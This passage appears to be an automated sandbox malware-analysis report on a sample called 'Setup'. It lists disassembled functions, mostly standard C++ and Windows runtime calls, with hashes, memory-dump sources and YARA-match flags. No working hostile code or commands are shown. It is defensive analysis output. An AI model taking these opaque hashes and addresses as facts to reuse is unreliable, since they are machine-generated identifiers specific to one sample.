                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _strrchr
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3213747228-0
                                                                                                                                                                                                                                                      • Opcode ID: eacdd1a48d98970d3187731e2bb8be3bc7fde5c65dfc6de09c7b5f1c7425a61f
                                                                                                                                                                                                                                                      • Instruction ID: a72358c2ffcb72e35ae622a21b1b9c260dc084197608f03efbf5a1cd7d4f209d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eacdd1a48d98970d3187731e2bb8be3bc7fde5c65dfc6de09c7b5f1c7425a61f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 99B16732A00365AFDB15CF28CC91BAEBBA9EF4F310F5941A5E945AF281D374D941C7A0
                                                                                                                                                                                                                                                      Function 02D87FC9 Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _strrchr
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3213747228-0
                                                                                                                                                                                                                                                      • Opcode ID: eacdd1a48d98970d3187731e2bb8be3bc7fde5c65dfc6de09c7b5f1c7425a61f
                                                                                                                                                                                                                                                      • Instruction ID: 4dd7d2b3720040b2e218f74c2aa783864a6d625c39f7570e509b6aef77675466
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eacdd1a48d98970d3187731e2bb8be3bc7fde5c65dfc6de09c7b5f1c7425a61f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86B14472A00799AFDB11DB28CC80BBEBBA5EF05310F548195E944EB382D774DD01DBA1
                                                                                                                                                                                                                                                      Function 02D3C054 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D3C091
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D3C0B3
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D3C0DB
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D3C1D5
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D3C209
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                                                                                                      • String ID: @PI
                                                                                                                                                                                                                                                      • API String ID: 459529453-979431602
                                                                                                                                                                                                                                                      • Opcode ID: 8b79870ac0ac31644188265c86ad301e8afc5e1f22b816f314848cad0c8ff8e9
                                                                                                                                                                                                                                                      • Instruction ID: dc6745d8a85c08faaae161a4783c0f7d3a4357413d95df6fbf7358a534aa6d02
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b79870ac0ac31644188265c86ad301e8afc5e1f22b816f314848cad0c8ff8e9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 99516770900259DBDF02DF98C9547AEBBB4EF54314F24806AC815BB380DBB9AE05DFA5
                                                                                                                                                                                                                                                      Function 031B3509 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 031B3510
                                                                                                                                                                                                                                                      • _Maklocchr.LIBCPMT ref: 031B35A3
                                                                                                                                                                                                                                                      • _Maklocchr.LIBCPMT ref: 031B35B3
                                                                                                                                                                                                                                                      • _Getvals.LIBCPMT ref: 031B35D5
                                                                                                                                                                                                                                                        • Part of subcall function 031ACBA3: _Maklocchr.LIBCPMT ref: 031ACBD2
                                                                                                                                                                                                                                                        • Part of subcall function 031ACBA3: _Maklocchr.LIBCPMT ref: 031ACBE8
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Maklocchr$GetvalsH_prolog3_
                                                                                                                                                                                                                                                      • String ID: false$true
                                                                                                                                                                                                                                                      • API String ID: 402987911-2658103896
                                                                                                                                                                                                                                                      • Opcode ID: 5549dd6ea5b6f1c8b6aa94245e2a293f38b9fef87190fde6d7d107a07c8fcfbe
                                                                                                                                                                                                                                                      • Instruction ID: 603fb2fce4c15af93dbcaacb87ba4934449d45b3f1519fb21895311284955771
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5549dd6ea5b6f1c8b6aa94245e2a293f38b9fef87190fde6d7d107a07c8fcfbe
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E6212C79D00308AFDF15EFA8D844ADF7BB8AF09750F04801AE919AF251DB719554CBE1
                                                                                                                                                                                                                                                      Function 031D5F60 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 748a23315a46a88a0a1ad3e10309a51b9801d5962a1d9f0e7917698a9e9b968c
                                                                                                                                                                                                                                                      • Instruction ID: 60e8898085189a264848bfef68ebf9867e84db639c9aa8f54feba9d15c4827ee
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 748a23315a46a88a0a1ad3e10309a51b9801d5962a1d9f0e7917698a9e9b968c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 61B13874A043459FDF15DF99D850BAEBBB6BF4F304F484159E4019F282CB749982CBA0
                                                                                                                                                                                                                                                      Function 031AB65D Relevance: 9.2, APIs: 6, Instructions: 175COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 031AB6A6
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 031AB711
                                                                                                                                                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 031AB72E
                                                                                                                                                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 031AB76D
                                                                                                                                                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 031AB7CC
                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 031AB7EF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ByteCharMultiStringWide
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2829165498-0
                                                                                                                                                                                                                                                      • Opcode ID: 912f4d0ce0d5bf026d28300fbe43d54a6aafcf10f459c6f9fc86e69f6c9e91c6
                                                                                                                                                                                                                                                      • Instruction ID: 605a2c7c58e5b187983bba233272ff0a5e8c7ba22807b83c35f2a2f3c8b50d51
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 912f4d0ce0d5bf026d28300fbe43d54a6aafcf10f459c6f9fc86e69f6c9e91c6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD510B7A504686ABDF20DFA8CC44FAF7BB9EF08752F198428F915EA180D771C850CB90
                                                                                                                                                                                                                                                      Function 031A6C80 Relevance: 9.2, APIs: 6, Instructions: 151COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031A6CBF
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031A6CE1
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031A6D09
                                                                                                                                                                                                                                                      • __Getctype.LIBCPMT ref: 031A6DE4
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031A6E4A
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031A6E7E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1102183713-0
                                                                                                                                                                                                                                                      • Opcode ID: d834ea4cdd3d40688292e063de4443e96293081ff282c9a354db464bf5056b57
                                                                                                                                                                                                                                                      • Instruction ID: 1ce52dd4d7ce468c1fc4678277dfb8dd8b800ba426ce75522eb6f42dac921717
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d834ea4cdd3d40688292e063de4443e96293081ff282c9a354db464bf5056b57
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE61CFB5C00A4ADFDB01DFA8C5047AEFBB4FF08314F188259C445BB291DB35AA85CB90
                                                                                                                                                                                                                                                      Function 03189530 Relevance: 9.2, APIs: 6, Instructions: 150COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 03189580
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031895A2
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031895CA
                                                                                                                                                                                                                                                      • __Getctype.LIBCPMT ref: 031896A5
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031896E0
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 03189714
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1102183713-0
                                                                                                                                                                                                                                                      • Opcode ID: 1f3ed08717f3dde1c6755bf9dfada5e4abc87f6e6f522d0ee943c5f5d415b88b
                                                                                                                                                                                                                                                      • Instruction ID: 9e8e327be88f8812ddc6ef9613f004dd036673a5f6814017cc3dd8f737cf7498
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f3ed08717f3dde1c6755bf9dfada5e4abc87f6e6f522d0ee943c5f5d415b88b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5351BAB5D00649CFDB00EF98D9447AEFBB4FF48314F288199C815AB391EB35AA45CB90
                                                                                                                                                                                                                                                      Function 02D3AD14 Relevance: 9.2, APIs: 6, Instructions: 150COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D3AD64
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D3AD86
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D3ADAE
                                                                                                                                                                                                                                                      • __Getctype.LIBCPMT ref: 02D3AE89
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D3AEC4
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D3AEF8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1102183713-0
                                                                                                                                                                                                                                                      • Opcode ID: bbaf182166c10a6998b5d7f3ce15c2de940b3d73265d80bf636c62bcb6e79074
                                                                                                                                                                                                                                                      • Instruction ID: 3c11d526b3ee34e58dd157f9cdfc124a2424bca78503157625a99da91945b1b4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bbaf182166c10a6998b5d7f3ce15c2de940b3d73265d80bf636c62bcb6e79074
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 335179B0E00259DBDB01CF98C9407AEFBF4EF54314F24816AC855AB380EB75AE45CBA5
                                                                                                                                                                                                                                                      Function 031C1AAA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,031C1AA1,031BFBEC,031A8094), ref: 031C1AB8
                                                                                                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 031C1AC6
                                                                                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 031C1ADF
                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,031C1AA1,031BFBEC,031A8094), ref: 031C1B31
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                                                                                                                      • Opcode ID: f7f79f488894e113123d8e22baecfb42b3a6aec6d99e7447048889916d19e76e
                                                                                                                                                                                                                                                      • Instruction ID: 1d9e17b4ce2cb6a96f0e59665e787f669223ff27db2465b03a6d182723959d7f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f7f79f488894e113123d8e22baecfb42b3a6aec6d99e7447048889916d19e76e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2401283623D7E17FEA24B6F47C98B6B26AADB3E674330033DE420490D2FF1188454A84
                                                                                                                                                                                                                                                      Function 031AFEEE Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AFEF5
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AFEFF
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • numpunct.LIBCPMT ref: 031AFF39
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AFF50
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AFF70
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AFF7D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3064348918-0
                                                                                                                                                                                                                                                      • Opcode ID: 7dc06fd46a46844338add822c054b4178f3460a36a21da8b9f64c4c9a67c0110
                                                                                                                                                                                                                                                      • Instruction ID: 278aa8cc8498266bba28710e949d71e146b42ac6645442dcee06104114b7f8a2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7dc06fd46a46844338add822c054b4178f3460a36a21da8b9f64c4c9a67c0110
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D101963E900759ABCB05EBA8DC14ABE7775AF4C711F180509E4116F2D1CF349A46CB91
                                                                                                                                                                                                                                                      Function 02D616D2 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D616D9
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D616E3
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • numpunct.LIBCPMT ref: 02D6171D
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D61734
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D61754
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D61761
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3064348918-0
                                                                                                                                                                                                                                                      • Opcode ID: 18dd5b8b0e882bd2422f7af078571c49340943f4e7adeec62e9aa60380ab10c8
                                                                                                                                                                                                                                                      • Instruction ID: 37be38ee47bf6dc9b5109b59fc4695a14d577ce4f5b73fabda8bc9523374f744
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18dd5b8b0e882bd2422f7af078571c49340943f4e7adeec62e9aa60380ab10c8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E01E135900129CBCF14EBA8C9546BDB7B6EF84320F240419E9086B380CF74DE01CBA5
                                                                                                                                                                                                                                                      Function 031AF633 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AF63A
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AF644
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • messages.LIBCPMT ref: 031AF67E
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AF695
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AF6B5
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AF6C2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 958335874-0
                                                                                                                                                                                                                                                      • Opcode ID: e6fed8359f0d165dd4244a94f5d11362cb0309ed5c62d310bea440c36bd521e5
                                                                                                                                                                                                                                                      • Instruction ID: d495e6f1c98c22ffb31ada511a708f9cbbec886c555572e3109b32088dab9df7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6fed8359f0d165dd4244a94f5d11362cb0309ed5c62d310bea440c36bd521e5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4601D63E9006199BCB05EBA8D814ABE77B1AF4C711F184409D4116F2E0CF349E45C790
                                                                                                                                                                                                                                                      Function 031AF6C8 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AF6CF
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AF6D9
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • messages.LIBCPMT ref: 031AF713
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AF72A
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AF74A
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AF757
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 958335874-0
                                                                                                                                                                                                                                                      • Opcode ID: eebce303e8fe61f5253021791d0b68e4c22c5fe788b81334c3a390103676f4b6
                                                                                                                                                                                                                                                      • Instruction ID: 7f7f61731065d21b323fac675709a53fc2118664f14d22e6873c4961467565f2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eebce303e8fe61f5253021791d0b68e4c22c5fe788b81334c3a390103676f4b6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD01963D900B199BCB05EBA8DC08ABE7BB5BF4C712F180409D4116F2D1DF349A46C791
                                                                                                                                                                                                                                                      Function 031AF59E Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AF5A5
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AF5AF
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • ctype.LIBCPMT ref: 031AF5E9
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AF600
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AF620
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AF62D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2958136301-0
                                                                                                                                                                                                                                                      • Opcode ID: 9962057a95604894a0de45b847ba8fe00c34aae35e605f724c32235694d66b64
                                                                                                                                                                                                                                                      • Instruction ID: febc30a0e45b346ed89acc6f9382055d816cf6060f370fb3a43b5024f4d71dd6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9962057a95604894a0de45b847ba8fe00c34aae35e605f724c32235694d66b64
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F701847D9007199FCB05EBA8D804ABE7775BF8C715F184409D4116F2A1CF349A45CB91
                                                                                                                                                                                                                                                      Function 031AFB70 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AFB77
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AFB81
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • moneypunct.LIBCPMT ref: 031AFBBB
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AFBD2
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AFBF2
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AFBFF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
